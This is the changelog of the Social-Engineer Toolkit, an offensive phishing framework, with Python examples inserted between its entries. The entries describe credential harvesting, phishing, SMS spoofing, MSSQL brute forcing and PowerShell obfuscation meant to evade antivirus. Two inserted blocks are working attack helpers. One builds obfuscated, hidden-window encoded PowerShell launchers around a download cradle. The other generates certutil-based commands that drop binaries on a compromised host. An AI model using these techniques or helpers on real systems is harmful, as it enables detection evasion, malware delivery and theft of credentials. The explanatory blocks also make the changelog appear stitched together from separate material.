CHANGELOG
~~~~~~~~~~~~~~~~
version 8.0.1
~~~~~~~~~~~~~~~~
* fix an issue when using import on web clone
* fix an issue when using hta attack vector would just put you out to main menu
~~~~~~~~~~~~~~~~
version 8.0
~~~~~~~~~~~~~~~~
* fix an issue that caused metasploit web server to not properly work with apache_server to off
* changed arduino powershell shellcode to https instead of http
* fixed bug that would not generate powershell encoded code when using arduino
* fixed a sudo check for SET when not running as root would cause a log error exception
* removed setup.py in favor of requirements.txt - no longer needed
* updated readme and install documentation to reflect new install procedures through requirements.txt
* updated copyright information to 2019
* removed irc channel, no longer active or used
* removed old sms phishing menu - spoofmytext never fixed their API and no longer supported
* removed full screen attack - no longer supported or maintained
* removed html generation from web attack, no longer supported
~~~~~~~~~~~~~~~~
version 7.7.9
~~~~~~~~~~~~~~~~
* fix source.js not copying over when using tabnabbing
* bump config version and add default apache dir to /var/www/html
* fix sendmail not found on OSX when using phishing emails
~~~~~~~~~~~~~~~~
version 7.7.8
~~~~~~~~~~~~~~~~
* fix ident issue on harvester throwing templates off
~~~~~~~~~~~~~~~~
version 7.7.7
~~~~~~~~~~~~~~~~
* remove old test code
* add better wording for templates
* remove old templates yahoo and facebook
* add better descriptions for using NAT/External IP addresses for credential harvester
* fix if a custom PDF is selected, it won't default to a blank pdf
* add user variable to harvester
~~~~~~~~~~~~~~~~
version 7.7.6
~~~~~~~~~~~~~~~~
* fix GOAT message when starting SSL server
* fix BaseServer not being identified in import
* fix OSX cloning for harvester (port allocation)
* fix web server from not closing properly when using java applet attack
~~~~~~~~~~~~~~~~
version 7.7.5
~~~~~~~~~~~~~~~~
* fix line split based on = on credential harvester
~~~~~~~~~~~~~~~~
version 7.7.4
~~~~~~~~~~~~~~~~
* fix code
~~~~~~~~~~~~~~~~
version 7.7.3
~~~~~~~~~~~~~~~~
* added better randomization of variable names for powershell payloads to evade detection
~~~~~~~~~~~~~~~~
version 7.7.2
~~~~~~~~~~~~~~~~
* fix endswith nonetype error
* fix directory traversal issue (thanks Spencer - awesome PR)
* add automatic IP detection for settings in credential harvester
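The two harvester fixes above (7.7.5: splitting posted fields on "=", and 7.7.2: directory traversal in the cloned-site server) are easy to get wrong in any small credential-capture web server. The following is an added example written for this changelog, not SET's own harvester code: it contrasts the fragile "decode, then split on every '='" parse with a first-'='-only parse, and shows a path resolver that refuses requests escaping the clone root. The POST body, the root path /tmp/clone and the function names are constructed for illustration.

```python
import os
from urllib.parse import unquote, unquote_plus

# Constructed sample POST body (not captured from any real harvester run).
# The password value decodes to "p=ss=w0rd"; those '=' characters are what
# a split-on-every-'=' parser trips over.
SAMPLE_BODY = "username=alice%40example.com&password=p%3Dss%3Dw0rd&submit=Login"


def parse_form_naive(body):
    """Fragile version: URL-decode the whole body first, then split each
    pair on every '='. A value that contains '=' produces extra fragments
    and the field is silently dropped."""
    fields = {}
    for pair in unquote_plus(body).split("&"):
        parts = pair.split("=")
        if len(parts) == 2:
            fields[parts[0]] = parts[1]
    return fields


def parse_form(body):
    """Fixed version: split each pair on the FIRST '=' only, then decode
    name and value separately, so '=' inside a value survives."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, sep, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value) if sep else ""
    return fields


def resolve_under_root(root, url_path):
    """Map a requested URL path onto a file under the cloned-site root and
    refuse anything that resolves outside it (the traversal class fixed in
    7.7.2). Returns the absolute file path, or None if the request escapes.
    The query string is discarded and percent-encoding is decoded first, so
    '%2e%2e/' is treated the same as '../'."""
    root = os.path.realpath(root)
    relative = unquote(url_path.split("?", 1)[0]).lstrip("/")
    candidate = os.path.realpath(os.path.join(root, relative))
    # commonpath is a prefix check on path components, not on raw strings,
    # so '/tmp/clone-evil' does not pass as being under '/tmp/clone'.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    print(parse_form_naive(SAMPLE_BODY))   # password field missing
    print(parse_form(SAMPLE_BODY))         # all three fields intact
    print(resolve_under_root("/tmp/clone", "/css/../index.html?x=1"))
    print(resolve_under_root("/tmp/clone", "/../../etc/passwd"))  # None
```

The realpath-then-commonpath check is done after decoding because the traversal payload usually arrives percent-encoded; checking the raw URL for ".." is not enough.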
~~~~~~~~~~~~~~~~
version 7.7.1
~~~~~~~~~~~~~~~~
* added nginx to service to stop on top of apache2
~~~~~~~~~~~~~~~~
version 7.7
~~~~~~~~~~~~~~~~
* rewrote grab_ipaddress() function to be a centralized routine that incorporates hostnames or IP addresses.
* rewrote grab_ipaddress() to include automatic detection of the IP address, with failover to manual entry. This allows easier selection of IP addresses without having to drop into a different window
* add hostname support for hta attack vector
* removed deploy binaries as a default option in the set.config file
* added ability for new menu for java applet that now allows you to specify multiple commands - useful if you want to insert things like empire payloads, etc.
* rewrote java applet to have additional functionality for multiple command menu
* better handling on command output
* fixed custom applet from not working properly
* fixed custom executable from not working properly
* added new unsigned obfuscated jar file
* added Java.java source files for customization
* added new Java Applet self-signed with new expirations
~~~~~~~~~~~~~~~~
version 7.6.5
~~~~~~~~~~~~~~~~
* added new chrome user agent in config - config will automatically update
~~~~~~~~~~~~~~~~
version 7.6.4
~~~~~~~~~~~~~~~~
* fix an issue where encoding messed up sql commands for mssql bruter attack vector in fasttrack
~~~~~~~~~~~~~~~~
version 7.6.3
~~~~~~~~~~~~~~~~
* fixed PEM import zipimporter error message - was more of a warning, suppressed if not using pyopenssl
* fixed a harvester not found exception in harvester
* fixed powershell teensy conversion error when printing output
~~~~~~~~~~~~~~~~
version 7.6.2
~~~~~~~~~~~~~~~~
* code cleanup on arduino (PR)
* fixed an issue in spear phishing that would hold payload generation into a constant loop
~~~~~~~~~~~~~~~~
version 7.6.1
~~~~~~~~~~~~~~~~
* fixed old legacy php5 depend in setup.py
* fixed a print_status error if pyopenssl wasn't loaded
~~~~~~~~~~~~~~~~
version 7.6
~~~~~~~~~~~~~~~~
* changed generate_random_string to be alpha only - no numeric - conflicts with latest encoding techniques and not needed to introduce numbers
* changed the hta attack vector to incorporate strong obfuscation
* fixed the HTA attack vector to include the new method for toString properly
* added new obfuscation into new encodedcommand function within multiple modules
* added new java applet to fix expired timeframe
* removed spoofmytextmessages as it is no longer working properly - will be added when service is fixed
* added latest airbase-ng to the repository to fix openssl issues
~~~~~~~~~~~~~~~~
version 7.5.1
~~~~~~~~~~~~~~~~
* moved config file to be the first identifier for metasploit config file then move onto other methods. Possible for conflicts to override
* fixed indent with pep8 formatting
~~~~~~~~~~~~~~~~
version 7.5
~~~~~~~~~~~~~~~~
* updated config to turn apache_server default from on to off. can switch this under /etc/setoolkit/set.config to on if you want apache.
* wrote centralized function for new powershell encodedcommand obfuscation
* added encodedcommand to java applet
* added encodedcommand to hta attack vector
* added encodedcommand to teensy
* added encodedcommand to all modules with powershell injection
* remove sms modules templates that were no longer used
* added routes to help with spoofing - default is auto
~~~~~~~~~~~~~~~~
version 7.4.5
~~~~~~~~~~~~~~~~
* update fasttrack wordlist (git suggestion)
* updated teensy codebase thanks to mikecjudge
~~~~~~~~~~~~~~~~
version 7.4.4
~~~~~~~~~~~~~~~~
* fixed /usr/bin/msfconsole not showing appropriate metasploit path
* fixed using hostname in powershell injector (when using http/https) payloads
* added better handling around import methods in sms spoofing and break out error messages
* change the api to python source for sms spoofing
~~~~~~~~~~~~~~~~
version 7.4.3
~~~~~~~~~~~~~~~~
* add a patch to pyopenssl through zipimporter - looks like a bug in pyopenssl when paths are specified
~~~~~~~~~~~~~~~~
version 7.4.2
~~~~~~~~~~~~~~~~
* define function meta_path() better
* fixed a bug in binary2teensy that would not properly identify metasploit if launcher is in /usr/bin/msfconsole
* fixed a bug in binary2teensy where it would not open the directory properly and make reports
~~~~~~~~~~~~~~~~
version 7.4.1
~~~~~~~~~~~~~~~~
* converted all powershell encodedcommand to abbreviated
~~~~~~~~~~~~~~~~
version 7.4
~~~~~~~~~~~~~~~~
* added better obfuscation around encodedcommand
* added new third party module google analytics attack: https://github.com/ZonkSec/google-analytics-attack. Walkthrough here: http://www.zonksec.com/blog/social-engineering-google-analytics/
* converted alphanumeric shellcode to accept DNS names
* changed alphanumeric shellcode to reverse_https instead of reverse_tcp
* added prompt for TLS support in email phishing
* added fsociety new logo - much larger lol
* fixed issue that would cause java applet to not launch webserver
* fixed issue that would cause metasploit browser to not launch webserver
* replaced spawn.py with the older version which did not do the full python3 conversion - os.path.join breaks in python2
* fixed spawning issue within spawn.py that would cause meta path to not launch in certain circumstances
* fixed an issue that would cause pdf generation to not complete properly
* added link to SET user manual into readme on github
* fixed an issue that would cause HTA attack vector to not spawn reverse https payloads properly (size constraint)
~~~~~~~~~~~~~~~~
version 7.3.16
~~~~~~~~~~~~~~~~
* fixed a bug that caused seautomatic to not detect full path of toolkit when launching from within directory
* fixed a bug in seautomate that would not wait for commands to execute based on time delay when launching and causing it to not submit
* fixed an issue where python3 would not import urllib.request
* fixed an issue that would cause python2.7 not to work without wget installed
~~~~~~~~~~~~~~~~
version 7.3.15
~~~~~~~~~~~~~~~~
* fix repetitive sqlport issue bug for non existent hosts
~~~~~~~~~~~~~~~~
version 7.3.14
~~~~~~~~~~~~~~~~
* fixed a delay change in mssql
~~~~~~~~~~~~~~~~
version 7.3.13
~~~~~~~~~~~~~~~~
* some versions of OpenSSL would throw a zipimporter error. 7.3.13 resolves this issue
~~~~~~~~~~~~~~~~
version 7.3.12
~~~~~~~~~~~~~~~~
* added prompt before brute forcing
* removed nmap depend and used standard sockets for tcp connect
* reduced connect time for mssql
* added warning when you are out of credits for sms spoof
~~~~~~~~~~~~~~~~
version 7.3.11
~~~~~~~~~~~~~~~~
* major rehaul on mssql bruter now supports threading support for all udp/1433 scans
* combined udp/1433 sweep/scan functions and simplified code
~~~~~~~~~~~~~~~~
version 7.3.10
~~~~~~~~~~~~~~~~
* added masking of password in sms
* fixed encoding issue with sms spoofing
~~~~~~~~~~~~~~~~
version 7.3.9
~~~~~~~~~~~~~~~~
* config cleanup
* fixed an issue when using psexec injection it would use reverse_tcp instead of reverse_https this was due to the set.config being used
~~~~~~~~~~~~~~~~
version 7.3.8
~~~~~~~~~~~~~~~~
* added encodedcommand to get around AV evasion
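Several entries on this page (7.7.3, 7.6, 7.5, 7.4.1 and this 7.3.8 entry) describe the same building block: take a PowerShell script, rename its variables to random alpha-only identifiers, and hand it to powershell.exe as a base64 UTF-16LE -EncodedCommand, using the abbreviated flag forms. The block below is an added example written for this changelog, not SET's powershell prep code: the sample script, the reserved-name list and the function names are constructed for illustration, and the decoder is included because it is the same transform a defender runs when triaging a captured launcher. It only handles plain $name variables; ${braced} names are left untouched.

```python
import base64
import random
import re
import string

# Automatic or reserved PowerShell variables that must keep their names.
# (Constructed list; extend it for scripts that use other automatic variables.)
_RESERVED = {"_", "null", "true", "false", "env", "args", "input", "this",
             "host", "error", "pid", "home", "psscriptroot", "psversiontable",
             "psitem", "matches", "profile"}
_VAR_RE = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*)")

# Constructed sample script (not a SET payload): three user variables
# ($target, $client, $data) and one automatic variable ($env:...).
SAMPLE_SCRIPT = (
    "$target = 'http://127.0.0.1:8080/'; "
    "$client = New-Object System.Net.WebClient; "
    "$data = $client.DownloadString($target); "
    "Write-Output $data.Length; "
    "Write-Output $env:COMPUTERNAME"
)


def generate_random_string(rng, length=8):
    """Alpha-only identifier: letters only, no digits (the 7.6 change)."""
    return "".join(rng.choice(string.ascii_letters) for _ in range(length))


def randomize_variables(script, seed=None):
    """Rename every user-defined $variable to a fresh random alpha name,
    consistently across the script. Returns (new_script, mapping) where
    mapping is {original_name_lowercased: new_name}."""
    rng = random.Random(seed)
    mapping = {}
    used = set(_RESERVED)

    def replace(match):
        name = match.group(1)
        key = name.lower()            # PowerShell variable names are case-insensitive
        if key in _RESERVED:
            return match.group(0)     # leave $env, $null, $_ ... alone
        if key not in mapping:
            new_name = generate_random_string(rng)
            while new_name.lower() in used:       # guarantee uniqueness
                new_name = generate_random_string(rng)
            used.add(new_name.lower())
            mapping[key] = new_name
        return "$" + mapping[key]

    return _VAR_RE.sub(replace, script), mapping


def encode_command(script):
    """Build the -EncodedCommand argument: base64 over the UTF-16LE bytes.
    powershell.exe expects UTF-16LE here, not UTF-8."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_command(encoded):
    """Reverse of encode_command (what you do when triaging a launcher)."""
    return base64.b64decode(encoded).decode("utf-16le")


def build_launcher(script, abbreviated=True, seed=None):
    """Full command line: randomize names, encode, prepend the flags.
    abbreviated=True uses the short flag forms adopted in 7.4.1."""
    obfuscated, _ = randomize_variables(script, seed)
    flags = "-nop -w hidden -e" if abbreviated else "-NoProfile -WindowStyle Hidden -EncodedCommand"
    return f"powershell {flags} {encode_command(obfuscated)}"


if __name__ == "__main__":
    obfuscated, mapping = randomize_variables(SAMPLE_SCRIPT, seed=1234)
    print(mapping)
    print(obfuscated)
    launcher = build_launcher(SAMPLE_SCRIPT, seed=1234)
    print(launcher)
    print(decode_command(launcher.split()[-1]))   # round-trips to the obfuscated script
```

Renaming only changes identifier names; string literals, cmdlet names and the overall shape of the script are unchanged, which is why later entries on this page keep layering further encoding on top of it.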
~~~~~~~~~~~~~~~~
version 7.3.7
~~~~~~~~~~~~~~~~
* replaced powershell prep with the old one - it broke almost all powershell injection in SET
* fixed an issue that would cause scanner to continue to scan even when port not discovered (function issue)
~~~~~~~~~~~~~~~~
version 7.3.6
~~~~~~~~~~~~~~~~
* fixed a bug around mssql bruter and code enhancement changes
~~~~~~~~~~~~~~~~
version 7.3.5
~~~~~~~~~~~~~~~~
* fixed an issue that would cause psexec fasttrack to not properly work based on with open
~~~~~~~~~~~~~~~~
version 7.3.4
~~~~~~~~~~~~~~~~
* fixed an issue with mssql bruter that would cause it to fail over to nmap scans even if host wasn't valid
* fixed an issue that would cause UDP to not work properly when scanning subnet ranges
* improved handling and descriptions in mssql
* fixed error in mssql bruter error handling exception
* fixed an issue that would cause TDS to error out when directly connecting to MSSQL server
* removed impacket TDS from src.core and added impacket.tds
* updated requirements.txt for impacket
* fixed a bug when using certutil method and pairing directory strings
* fixed automatic brute on mssql server when single host was scanned
* fixed spacing issue on msfconsole -r was set to msfconsole-r
~~~~~~~~~~~~~~~~
version 7.3.3
~~~~~~~~~~~~~~~~
* code audit and cleanup (much appreciated Cabalist)
* fixed set.options error if file isn't found
~~~~~~~~~~~~~~~~
version 7.3.2
~~~~~~~~~~~~~~~~
* fixed an issue if python-requests was not installed it would bomb the module and SET out
~~~~~~~~~~~~~~~~
version 7.3.1
~~~~~~~~~~~~~~~~
* PR for better python3 and pep8 handling - (thanks Cabalist)
* added better handling around SMS spoofing and if legacy version of openssl is around
* updated requirements.txt
* added setdir definition from setdir to core.setdir on setoolkit
* removed old version of Signed_update.jar.orig, updated .gitignore to include .jar, and removed old version of unsigned.jar
~~~~~~~~~~~~~~~~
version 7.3
~~~~~~~~~~~~~~~~
* completely rewrote the SMS spoofing module from scratch to use spoofmytextmessage.com - the folks over there were super helpful and provided an undocumented API to be used within SET. This now works great and has been extensively tested.
* sped up the load process - when using the main menu system, the loading would pull from github each time the show_banner() function was called; this now only loads once per SET launch
* fixed a string integer error from input to raw_input in the RDP DOS use after free in exploits
* added libapache2-mod-php to setup.py - needed for credential harvester
* added python-requests to setup.py - needed for sms spoofing
* added better check for python-requests in sms spoofing
* added better formatting within sms spoofing
* added error handling to sms spoofing if something goes wrong during auth process
* removed socket error when no internet connection using update check
* use global lock for checking previous use on update
* general cleanup of setcore
* cleaned up setup file and added better descriptions
* fixed a bug that would cause fsattack to not load properly
* moved from pulling entire setcore which is a few thousand lines to adding src/core/set.version which contains the version - much faster in pulling down
* fixed a bug in dell drac that caused it to error out
* added timeout delay for pulling the new version - the biggest challenge here is that urllib is built on socket, and the socket timeout does not cover gethostbyname(), which does not support a timeout; needed to run the check under multiprocessing and poll it for 8 seconds to enforce a timeout when checking for updates
* added check for urllib for python2 and python3 compatibility
* changed delldrac to python 2 to 3 compatibility and rewrote requests to use solid urlopen instead of requests
* added keyboard exception handling for urllib pull for version
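The update-check entries above describe a real limitation: socket timeouts do not bound the blocking name resolution inside urlopen(), so the only reliable deadline is to run the fetch in a child process and stop waiting after a fixed poll interval. The following is an added example for this changelog, not SET's update code: it does the fetch in a child, waits on a Pipe with poll(8 seconds), terminates the child if it is still stuck, and compares the fetched version string with the local one. VERSION_URL is an assumed location for the set.version file mentioned above (not verified against the project), and the two fake fetchers are constructed so the demo runs offline.

```python
import multiprocessing
import time
from urllib.request import urlopen

# Assumed location of the one-line version file (placeholder, not verified).
VERSION_URL = "https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version"
DEFAULT_DEADLINE = 8.0   # seconds, matching the 7.3 entry


def parse_version(text):
    """'7.3.1' -> (7, 3, 1); tuples compare component-wise, so (7, 3, 1) > (7, 3)."""
    return tuple(int(part) for part in text.strip().split("."))


def is_newer(remote, local):
    return parse_version(remote) > parse_version(local)


def fetch_remote_version(url=VERSION_URL):
    """Real fetch. urlopen's timeout covers connect and read, but NOT the
    DNS lookup inside it, which is why callers wrap this in a child process."""
    with urlopen(url, timeout=5) as response:
        return response.read().decode("ascii", "replace").strip()


def _worker(func, args, conn):
    """Child side: run the fetch and ship the result (or the error) back."""
    try:
        conn.send(("ok", func(*args)))
    except Exception as exc:
        conn.send(("error", repr(exc)))
    finally:
        conn.close()


def run_with_deadline(func, args=(), deadline=DEFAULT_DEADLINE):
    """Run func(*args) in a child process; give up after 'deadline' seconds.
    Returns the result, or None on timeout or error. The child is killed if
    it is still blocked (for example inside gethostbyname()) at the deadline."""
    receiver, sender = multiprocessing.Pipe(duplex=False)
    child = multiprocessing.Process(target=_worker, args=(func, args, sender), daemon=True)
    child.start()
    sender.close()                    # parent keeps only the receiving end
    result = None
    if receiver.poll(deadline):       # blocks for at most 'deadline' seconds
        try:
            status, value = receiver.recv()
            if status == "ok":
                result = value
        except EOFError:              # child died without reporting
            pass
    receiver.close()
    if child.is_alive():
        child.terminate()
    child.join()
    return result


def check_for_update(local_version, fetcher=fetch_remote_version,
                     url=VERSION_URL, deadline=DEFAULT_DEADLINE):
    """Returns (remote_version_or_None, update_available)."""
    remote = run_with_deadline(fetcher, (url,), deadline)
    if remote is None:
        return None, False
    try:
        return remote, is_newer(remote, local_version)
    except ValueError:                # garbage in the version file
        return remote, False


# Offline stand-ins for the demo (constructed; no network involved).
def fake_fast_fetcher(url):
    return "7.3.1"


def fake_stuck_fetcher(url):
    time.sleep(30)                    # models a resolver that never answers
    return "9.9.9"


if __name__ == "__main__":
    print(check_for_update("7.3", fetcher=fake_fast_fetcher))                  # ('7.3.1', True)
    print(check_for_update("7.3", fetcher=fake_stuck_fetcher, deadline=1.0))  # (None, False)
```

A thread would not do here: a thread blocked in the resolver cannot be interrupted, whereas a child process can be terminated, which is the whole point of paying the process start-up cost for a two-second check.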
~~~~~~~~~~~~~~~~
version 7.2.3
~~~~~~~~~~~~~~~~
* added better handling around powershell detection
~~~~~~~~~~~~~~~~
version 7.2.2
~~~~~~~~~~~~~~~~
* added fsociety banner to initial loading
~~~~~~~~~~~~~~~~
version 7.2.1
~~~~~~~~~~~~~~~~
* fix automatic update line replace bug
~~~~~~~~~~~~~~~~
version 7.2
~~~~~~~~~~~~~~~~
* fixed an issue on installer not copying SET directory properly (why was I moving a file and ... nevermind.)
* changed delay time for HTA attack vector from 3 seconds to 10 seconds to allow proper loading
* added wording when using gmail and application specific passwords
* rewrote ms08-067 instead of being the python exploit to use the metasploit default which is much more reliable
* re-introduced the SMS spoofing method (now option 10) - it has been optimized and reduced to only use SMSGang as a main provider.
* added ability to add your own attachments via file format attacks instead of having to use the ones built in
* added ability to add your own attachments via mass mailer attack vector
* added new config option called wget_deep and incremented config to 7.2 - this will allow 1 deep download wgets
* added ability to select deeper wgets through the web cloner in the web attack vectors - this will allow you to clone the site and not just the index.html, which might be better. To enable this, edit /etc/setoolkit/set.config and turn WGET_DEEP to on.
* added a new check upon startup (which may delay the start of SET for a couple seconds) that checks whether a new version of SET is available - this is displayed on the main launcher UI when you first start SET
* fixed setup.py a bit to reflect more on what's out there. I may convert this to a standard setup installer eventually
* updated the licensing agreement - should check it out =)
* changed the default payload in HTA and Java Applet attack to be reverse_https instead of reverse_tcp (although both can be specified)
* number of fixes around spacing for python3 and python3 compatibility (urllib)
* removed string decode on HTA attack vector which is no longer needed in python3 (and python2)
* changed urllib2 to import urllib instead for python2 and python3 compatibility in setcore
* changed encoding techniques to bytes instead of strings for python3 compatibility
~~~~~~~~~~~~~~~~
version 7.1.2
~~~~~~~~~~~~~~~~
* fixed an issue on pdf generation payloads when metasploit had never been run before on a system - now forces directory creation
~~~~~~~~~~~~~~~~
version 7.1.1
~~~~~~~~~~~~~~~~
* fixes an issue when generating PDF exes that would cause an outfile error
~~~~~~~~~~~~~~~~
version 7.1
~~~~~~~~~~~~~~~~
* added so you can use multiple IP addresses separated by spaces on mssql bruter
* rewrote mssql bruter to incorporate pymssql
* rewrote delivery payload method to use certutil instead of windows debug method
* added better description around handling tabnabbing
* added better ability to handle powershell injection
* rewrote and moved off impacket to pymssql
* added import own binary for mssql deployment
* changed deployment method from old base64 conversion bypass to Matthew Graeber's certutil binary method
* added option to import new file or metasploit file for meterpreter bypass method
* added better handling around binary injection technique for binary dropper method
* added better threading within brute forcing sql accounts
* fixed an issue where SET directory would not properly fill in dll hijacking and give invalid /root/.setsrc path instead of .set/src
* reduced file format generation counter to when it prompts error message
* fixed an issue in mssql bruter that would remove the port parameter when attempting to brute force
* added if udp 1434 is not found, it will fall back to nmap to discover if 1433 default port is open - ran into pentest where udp wasn't allowed and missed SQL servers because of this
* added better handling and description of the SQL servers found during the test - might be useful for pentests to store that data somewhere
* added more improvements and handling around MSSQL server
* added latest version of ridenum to fasttrack
* changed rid_enum.py to ridenum.py to be consistent with naming schema
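The 7.1 entries switch binary delivery over MSSQL from the old debug/base64 conversion to the certutil method: the binary is wrapped as a PEM-looking text file, written to the target with echo, and restored with "certutil -decode". The block below is an added example for this changelog, not SET's deployment code: it reproduces the wrapping format, generates the cmd.exe lines, and replays them in Python to confirm the recreated file decodes to the original bytes. SAMPLE_BINARY, the file names and the function names are constructed; real certutil behaviour is not exercised, only mimicked.

```python
import base64

CERT_HEADER = "-----BEGIN CERTIFICATE-----"
CERT_FOOTER = "-----END CERTIFICATE-----"

# Constructed stand-in for a payload (not a real executable).
SAMPLE_BINARY = b"MZ" + bytes(range(256)) * 4


def certutil_encode(data, line_length=64):
    """Mimic 'certutil -encode': header/footer around base64 broken into
    64-character lines with CRLF line endings."""
    b64 = base64.b64encode(data).decode("ascii")
    chunks = [b64[i:i + line_length] for i in range(0, len(b64), line_length)]
    return "\r\n".join([CERT_HEADER, *chunks, CERT_FOOTER]) + "\r\n"


def certutil_decode(text):
    """Mimic 'certutil -decode': skip header/footer, ignore surrounding
    whitespace on each line, base64-decode the rest."""
    body = "".join(
        line.strip() for line in text.splitlines()
        if line.strip() and not line.strip().startswith("-----")
    )
    return base64.b64decode(body, validate=True)


def build_drop_commands(data, b64_name="update.txt", exe_name="update.exe"):
    """cmd.exe lines that recreate the wrapped file with echo, decode it with
    certutil, and remove the text copy. The space before the redirect is
    deliberate: 'echo ...1>file' would be parsed by cmd.exe as a handle
    redirect and lose the trailing digit, so every line is written as
    'echo <text> >> file' (the trailing space is tolerated by the decoder)."""
    wrapped = certutil_encode(data).splitlines()
    commands = []
    for index, line in enumerate(wrapped):
        redirect = ">" if index == 0 else ">>"    # first line creates the file
        commands.append(f"echo {line} {redirect} {b64_name}")
    commands.append(f"certutil -decode {b64_name} {exe_name}")
    commands.append(f"del {b64_name}")
    return commands


def replay_echo_commands(commands):
    """Simulate what cmd.exe writes for the echo lines: the text, the space
    that precedes the redirect, then CRLF. Lets us verify the recreated file
    without a Windows host."""
    content = ""
    for command in commands:
        if not command.startswith("echo "):
            continue
        # 'TEXT >> file' -> ('TEXT', ' >', '> file'); 'TEXT > file' -> ('TEXT', ' >', ' file')
        text, _, _target = command[len("echo "):].rpartition(" >")
        content += text + " \r\n"
    return content


if __name__ == "__main__":
    commands = build_drop_commands(SAMPLE_BINARY)
    print(len(commands), "commands; first:", commands[0])
    recreated = replay_echo_commands(commands)
    print("round trip ok:", certutil_decode(recreated) == SAMPLE_BINARY)
```

One echo per 64-character line means a payload of a few hundred kilobytes turns into thousands of commands, which is why this method only makes sense where the attacker already has command execution (as with xp_cmdshell here) and no file transfer channel. On the defensive side, "certutil -decode" run from a non-interactive parent is a cheap process-creation detection.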
~~~~~~~~~~~~~~~~
version 7.0.6
~~~~~~~~~~~~~~~~
* fix an issue that caused tabnabbing to fail
~~~~~~~~~~~~~~~~
version 7.0.5
~~~~~~~~~~~~~~~~
* switched psexec powershell injection to reverse_https
* switched mssql payload injection to reverse_https
~~~~~~~~~~~~~~~~
version 7.0.4
~~~~~~~~~~~~~~~~
* fixed an issue with tds not working on mssql with powershell injection
* fixed an issue that would cause payload generation to continue generating and never close
* added powershell obfuscation for all attack vectors =)
~~~~~~~~~~~~~~~~
version 7.0.3
~~~~~~~~~~~~~~~~
* fixed a python3 format issue in tail
* removed bleeding edge check since they should be in rolling now (thanks L1ghtn1ng)
~~~~~~~~~~~~~~~~
version 7.0.2
~~~~~~~~~~~~~~~~
* added a capture recorder within SET so that you don't need to exit when using credential harvester with Apache specified. Can still exit whenever you want and will still be under your apache root directory, but this way - everything is self contained within SET itself.
* added disclaimer for if php files were rendered as text - means proper php plugins are not installed
* multiple fixes for urllib.imports for python2/3 compatibility
~~~~~~~~~~~~~~~~
version 7.0.1
~~~~~~~~~~~~~~~~
* fixed an issue where harvester would error out when using python2 - worked fine in python3 - added backwards compatibility
* fixed an issue that would cause the IP address to not update when selecting credential harvester and cause a double prompt
~~~~~~~~~~~~~~~~
version 7.0
~~~~~~~~~~~~~~~~
* fixed an issue that would cause payload creation to halt if .msf5 was a path instead of .msf4
* fixed an issue when reimporting modules or re-selecting options that would cause it to not work properly
* updated config option to use most recent user agent string
* massive overhaul for pep8
* massive overhaul for python3
* added more words to mssql wordlist
* major refactoring of python codebase to support both python2 and python3
* restructured HTA attack vector and improved codebase to redirect after 3 seconds to the legitimate website while still launching the HTA file, this makes it very easy to coax the victim into believing the HTA they are running is from a legitimate link
* rewrote alphanumeric shellcode injector to be python3 compliant and optimized
* added module_rewrite function instead of reload() for python3
* added Metasploit MS15-100 Microsoft Windows Media Center MCL Vulnerability to fileformat attacks
* added Fedora automatic install thanks to whoismath PR
~~~~~~~~~~~~~~~~
version 6.5.9
~~~~~~~~~~~~~~~~
* fixed a bug that was causing credential harvester to fail
~~~~~~~~~~~~~~~~
version 6.5.8
~~~~~~~~~~~~~~~~
* fixed an issue that would write out .setindex.html instead of copying to .set/index.html.
* fixed an issue that would cause harvester log to not properly write out on certain systems.
* fixed an issue that would cause the harvester log file to not write if path was /var/www/html
* added to automatically check if Kali is in use - removes the old install and git clones in order to keep SET up to date
* removed automatic SET update and put a warning that SET will be out of date using Kali-current vs bleeding edge
~~~~~~~~~~~~~~~~
version 6.5.7
~~~~~~~~~~~~~~~~
* fix chown issue on different platforms when using harvester (pull request)
* fixed an issue when moving to /etc/setoolkit/set.config would throw exception when using teensy attack vectors, now fixed
* fixed an issue which would cause msf.exe to not be found when using dll hijacking
~~~~~~~~~~~~~~~~
version 6.5.6
~~~~~~~~~~~~~~~~
* fixed solo payload generation where listener would not launch properly
~~~~~~~~~~~~~~~~
version 6.5.5
~~~~~~~~~~~~~~~~
* fixed automatic payload creation on pdf template where on Kali it would hang on waiting for payload
~~~~~~~~~~~~~~~~
version 6.5.4
~~~~~~~~~~~~~~~~
* fixed pdf template creation when using file format attack vector on option number one - was due to msfcli being removed - converted over to msfconsole
* fixed using infectious media generator using pdf template
* added automatic detection of /var/www/html or /var/www
* added automatic path selection when using config file
~~~~~~~~~~~~~~~~
version 6.5.3
~~~~~~~~~~~~~~~~
* added automatic path detection for metasploit in SET and PTF
~~~~~~~~~~~~~~~~
version 6.5.2
~~~~~~~~~~~~~~~~
* added smallest payload option for msfvenom shellcode creation
* added automatic start of apache on hta attack
* fixed powershell teensy deployment
~~~~~~~~~~~~~~~~
version 6.5.1
~~~~~~~~~~~~~~~~
* changed meta_path to pull blank path when using Kali linux
* changed msfvenom and msfconsole launching
* added better check for fasttrack
~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added brand new attack vector HTA attack and incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in certain attack vectors
* slimmed down powershell injection http/https attack vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
* added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
* added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
~~~~~~~~~~~~~~~~
version 6.4.1
~~~~~~~~~~~~~~~~
* fixed config related issue in seautomate, seupdate, and msf payload generation
* fixed an issue causing src to be undefined in infectious media generator
~~~~~~~~~~~~~~~~
version 6.4
~~~~~~~~~~~~~~~~
* fixed an issue that would cause 32-bit powershell injection from possibly not working
* fixed an issue that would cause payloads to not fire when powershell injection occurs
* restructured how bleeding edge is written initially and no longer overwrite sources.list
* removed slim_set, was used for pwnie way back and is no longer needed
* cleaned up an old mailing_list.txt format that is no longer needed
* overhauled the config directories, no longer is there a config/ directory within the SET root directory, it is now under /etc/setoolkit/set.config
* added dynamic import updates to /etc/setoolkit
* factored config changes from git pull request to fix grammar and formatting
* slimmed down powershell injection code by 32 bytes
* reworked config imports from harvester and cloner for the new config format
